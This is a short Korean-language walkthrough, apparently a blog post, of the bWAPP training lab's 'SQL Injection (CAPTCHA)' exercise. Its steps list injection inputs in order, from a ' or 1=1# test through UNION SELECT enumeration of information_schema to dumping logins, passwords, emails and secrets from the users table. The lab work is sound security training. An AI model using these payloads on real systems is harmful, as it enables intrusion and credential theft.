bWAPP 17. SQL Injection (CAPTCHA)

                                           SQL Injection ( CAPTCHA)

-Ptod7 을 입력하니

해당 창이 나오게 된다.

 

 

[ 공격 가능 확인 ]

입력 값 : ' or 1=1#

 

 

 

 

 

 

 

 

 

 

[ 컬럼 수 확인 ]

입력 값 : ' union select all 1,2,3,4,5,6,7#

 

 

 

 

 

 

[ 버전 확인 ]

입력 값 : ' union select all 1,@@version,database(),4,5,6,7#

 

 

 

 

 

[ 테이블 명 확인하기 ]

 

 

입력 값 :  ' UNION SELECT ALL 1, table_name,3,4,5,6,7 from information_schema.tables#

 

 

 

 

 

 

 

[ user 테이블 컬럼 명 추출 ]

 

입력 값 :  ' UNION SELECT ALL 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#

 

 

 

 

 

 

 

[ user 테이블의 컬럼 내용 확인 ]

 

 

입력 값 :  0' union select all 1, concat(id,login),password,email,secret,6,7 from users#